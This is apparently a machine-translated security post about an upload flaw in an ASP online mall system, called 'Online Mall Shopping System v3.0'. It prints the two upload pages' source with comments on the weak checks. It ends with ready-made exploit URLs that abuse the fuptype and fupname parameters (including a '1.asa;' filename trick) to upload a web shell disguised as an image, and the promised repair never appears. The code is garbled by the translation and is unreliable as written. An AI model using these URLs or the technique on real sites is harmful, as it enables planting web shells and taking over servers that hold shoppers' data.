Online Mall Shopping System v3.0 full-featured version Upload Vulnerability and repair

Author: village chief
File u_sc1.asp source code:

<!--#include file="../include/yiwebchina.asp"--><%session("fuptype")=request("fuptype")            

'Here, fuptype is accepted and saved to the session ("fuptype"). The next file must use session ("fupname") = request ("fupname ")

'Here, fupname is accepted and saved to the session ("fupname"). The next file must use session ("frmname") = request ("frmname ") /* omitting the Code */<form name = "form1" method = "post" action = "u_sc1save.asp"

Enctype = "multipart/form-data"> <B> select the file to be uploaded: </B> <br> <input type = file name = "file1"> <input type = submit name = "submit" value = "Upload"> <br> · after clicking "Upload, please be patient (do not click "Upload" Again). The upload time depends on the file size and network conditions. <br> · to save space, optimize image files as much as possible, we recommend that a single file not exceed 50 kb. <Br> · when transferring large files, the server may be slow or unstable. We recommend that you use FTP to upload large files. </Form>

File u_sc1save.asp source code

<! -- # Include file = ".. /include/yiwebchina. asp "--> 
'Here, point 2 is used to change the fupname value in the URL to 1.asa; for many reasons, filenameend = file. filenamefilenameend = split (filenameend ,". ") n = UBound (filenameend) filename = filename & filenameend (n) if fuptype <>" db "thenif file. fileSize & gt; 200000 thenresponse. write "<script language = 'javascript '>" response. write "alert ('the file you uploaded is too large and cannot be uploaded successfully. The maximum size of a single file cannot exceed 200 KB! '); "Response. write "location. href = 'javascript: history. go (-1) '; "response. write "</script>" response. endend ifend ifif fuptype = "adv" or fuptype = "pic" then
'The problem also occurs here. When fuptype = adv or fuptype = pic, the suffix if LCase (filenameend (n) is determined )) <> "gif" and LCase (filenameend (n) <> "jpg" and LCase
(Filenameend (n) <> "swf" and LCase (filenameend (n) <> "htm" thenresponse. write "<script language = 'javascript '>" response. write "alert ('the selected file format cannot be uploaded. Please check and upload again! '); "Response. write "location. href = 'javascript: history. go (-1) '; "response. write "</script>" response. endend ifend ifif fuptype = "adv" then
'Use point 1 here, and then determine the fuptype value. ADV and PIC cannot be used. If this parameter is left blank, no path will be returned after the upload,
Therefore, only pic1, link, and db can be used. You just need to select one. savepath = ".. /images/adv/"& filenameelseif fuptype =" pic "thensavepath = ".. /pic/digi/"& filenameelseif fuptype =" pic1 "thensavepath = ".. /pic/digi1/"& filenameelseif fuptype =" link "thensavepath = ".. /images/links/"& filenameelseif fuptype =" db "thensavepath = ". /"& filenameend iffile. saveAs Server. mappath (savepath) response. write "File Uploaded successfully! The physical path of the uploaded file is: "response. write "<font color = red>" & Server. mappath (savepath) & "</font> <br>" response. write "<a href = '" & savepath & "'target =' _ blank '> click to preview the uploaded file </a>" response. write "<br> <INPUT onclick = 'javascript: window. close ();'
Type = submit value = 'upload completed '> "%>
The three files involved in this file are yiwebchina. asp, buyok. asp, functions. asp, all of which are verified by ADMIN.
Vulnerability exploitation 1:
Http://www.bkjia.com/admin/u_sc1.asp? Fuptype = pic & fupname = 1.asa; & frmname = youpic
(Upload the SHELL Image Format)



Vulnerability exploitation 2:
Http://www.bkjia.com/admin/u_sc1.asp? Fuptype = pic1 & fupname = banner3 & frmname = youpic (upload as needed)


 
Http://www.bkjia.com/admin/u_sc1.asp? Fuptype = link & fupname = banner3 & frmname = youpic (upload as needed)
Http://www.bkjia.com/admin/u_sc1.asp? Fuptype = db & fupname = banner3 & frmname = youpic (upload as needed)
Note that the SHELL file size should not exceed 200 KB (except for the fourth DB upload)